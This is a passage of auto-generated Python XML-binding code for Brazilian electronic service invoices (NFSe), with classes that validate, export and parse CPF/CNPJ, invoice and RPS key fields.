warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPF_patterns_, ))
validate_tpCPF_patterns_ = [['^[0-9]{0}$|^[0-9]{11}$']]
def validate_tpCNPJ(self, value):
# Validate type tpCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCNPJ_patterns_, ))
validate_tpCNPJ_patterns_ = [['^[0-9]{14}$']]
def hasContent_(self):
if (
self.CPF is not None or
self.CNPJ is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpCPFCNPJ2', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpCPFCNPJ2')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpCPFCNPJ2')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpCPFCNPJ2', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpCPFCNPJ2'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpCPFCNPJ2', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.CPF is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPF>%s</ns1:CPF>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPF), input_name='CPF')), eol_))
if self.CNPJ is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CNPJ>%s</ns1:CNPJ>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CNPJ), input_name='CNPJ')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'CPF':
CPF_ = child_.text
CPF_ = self.gds_validate_string(CPF_, node, 'CPF')
self.CPF = CPF_
# validate type tpCPF
self.validate_tpCPF(self.CPF)
elif nodeName_ == 'CNPJ':
CNPJ_ = child_.text
CNPJ_ = self.gds_validate_string(CNPJ_, node, 'CNPJ')
self.CNPJ = CNPJ_
# validate type tpCNPJ
self.validate_tpCNPJ(self.CNPJ)
# end class tpCPFCNPJ2
class tpConsultaNFSe(GeneratedsSuper):
"""NFSe de retorno de consulta."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, NumeroNFe=None, CodigoVerificacao=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, RazaoSocialPrestador=None, TipoRecolhimento=None, ValorDeduzir=None, ValorTotal=None, Aliquota=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.NumeroNFe = NumeroNFe
self.validate_tpNumero(self.NumeroNFe)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
self.TipoRecolhimento = TipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
self.ValorDeduzir = ValorDeduzir
self.validate_tpValor(self.ValorDeduzir)
self.ValorTotal = ValorTotal
self.validate_tpValor(self.ValorTotal)
self.Aliquota = Aliquota
self.validate_tpAliquota(self.Aliquota)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpConsultaNFSe.subclass:
return tpConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDataHora(self, value):
# Validate type tpDataHora, a restriction on xs:dateTime.
if value is not None and Validate_simpletypes_:
pass
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def validate_tpTipoRecolhimento(self, value):
# Validate type tpTipoRecolhimento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'R']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRecolhimento' % {"value" : value.encode("utf-8")} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpAliquota(self, value):
# Validate type tpAliquota, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpAliquota' % {"value" : value} )
if len(str(value)) >= 6:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpAliquota' % {"value" : value} )
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.NumeroNFe is not None or
self.CodigoVerificacao is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.RazaoSocialPrestador is not None or
self.TipoRecolhimento is not None or
self.ValorDeduzir is not None or
self.ValorTotal is not None or
self.Aliquota is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpConsultaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.NumeroNFe is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFe>%s</ns1:NumeroNFe>%s' % (self.gds_format_integer(self.NumeroNFe, input_name='NumeroNFe'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
if self.TipoRecolhimento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRecolhimento>%s</ns1:TipoRecolhimento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRecolhimento), input_name='TipoRecolhimento')), eol_))
if self.ValorDeduzir is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorDeduzir>%s</ns1:ValorDeduzir>%s' % (self.gds_format_float(self.ValorDeduzir, input_name='ValorDeduzir'), eol_))
if self.ValorTotal is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotal>%s</ns1:ValorTotal>%s' % (self.gds_format_float(self.ValorTotal, input_name='ValorTotal'), eol_))
if self.Aliquota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Aliquota>%s</ns1:Aliquota>%s' % (self.gds_format_float(self.Aliquota, input_name='Aliquota'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'NumeroNFe':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFe')
self.NumeroNFe = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNFe)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
# validate type tpDataHora
self.validate_tpDataHora(self.DataEmissaoRPS)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
elif nodeName_ == 'TipoRecolhimento':
TipoRecolhimento_ = child_.text
TipoRecolhimento_ = self.gds_validate_string(TipoRecolhimento_, node, 'TipoRecolhimento')
self.TipoRecolhimento = TipoRecolhimento_
# validate type tpTipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
elif nodeName_ == 'ValorDeduzir':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorDeduzir')
self.ValorDeduzir = fval_
# validate type tpValor
self.validate_tpValor(self.ValorDeduzir)
elif nodeName_ == 'ValorTotal':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotal')
self.ValorTotal = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotal)
elif nodeName_ == 'Aliquota':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'Aliquota')
self.Aliquota = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.Aliquota)
# end class tpConsultaNFSe
class tpChaveNFeRPS(GeneratedsSuper):
"""Tipo que representa a chave de uma NFSe e a Chave do RPS que a mesma
substitui."""
subclass = None
superclass = None
def __init__(self, ChaveNFe=None, ChaveRPS=None):
self.original_tagname_ = None
self.ChaveNFe = ChaveNFe
self.ChaveRPS = ChaveRPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveNFeRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveNFeRPS.subclass:
return tpChaveNFeRPS.subclass(*args_, **kwargs_)
else:
return tpChaveNFeRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.ChaveNFe is not None or
self.ChaveRPS is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveNFeRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveNFeRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveNFeRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveNFeRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveNFeRPS'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveNFeRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.ChaveNFe is not None:
self.ChaveNFe.export(outfile, level, namespace_, name_='ChaveNFe', pretty_print=pretty_print)
if self.ChaveRPS is not None:
self.ChaveRPS.export(outfile, level, namespace_, name_='ChaveRPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'ChaveNFe':
obj_ = tpChaveNFe.factory()
obj_.build(child_)
self.ChaveNFe = obj_
obj_.original_tagname_ = 'ChaveNFe'
elif nodeName_ == 'ChaveRPS':
obj_ = tpChaveRPS.factory()
obj_.build(child_)
self.ChaveRPS = obj_
obj_.original_tagname_ = 'ChaveRPS'
# end class tpChaveNFeRPS
class tpChaveNFe(GeneratedsSuper):
"""Chave de identificação da NF-e."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, NumeroNFe=None, CodigoVerificacao=None, RazaoSocialPrestador=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.NumeroNFe = NumeroNFe
self.validate_tpNumero(self.NumeroNFe)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveNFe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveNFe.subclass:
return tpChaveNFe.subclass(*args_, **kwargs_)
else:
return tpChaveNFe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.NumeroNFe is not None or
self.CodigoVerificacao is not None or
self.RazaoSocialPrestador is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveNFe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveNFe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpChaveNFe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpChaveNFe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpChaveNFe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpChaveNFe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoPrestador>%s</ns1:InscricaoPrestador>%s' % (self.gds_format_integer(self.InscricaoPrestador, input_name='InscricaoPrestador'), eol_))
if self.NumeroNFe is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFe>%s</ns1:NumeroNFe>%s' % (self.gds_format_integer(self.NumeroNFe, input_name='NumeroNFe'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'NumeroNFe':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFe')
self.NumeroNFe = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNFe)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
# end class tpChaveNFe
class tpChaveRPS(GeneratedsSuper):
"""Tipo que define a chave identificadora de um RPS."""
subclass = None
superclass = None
def __init__(self, InscricaoPrestador=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, RazaoSocialPrestador=None):
self.original_tagname_ = None
self.InscricaoPrestador = InscricaoPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocial(self.RazaoSocialPrestador)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpChaveRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpChaveRPS.subclass:
return tpChaveRPS.subclass(*args_, **kwargs_)
else:
return tpChaveRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoPrestador is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.RazaoSocialPrestador is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpChaveRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpChaveRPS')
if imported_ns_def_ is not None:
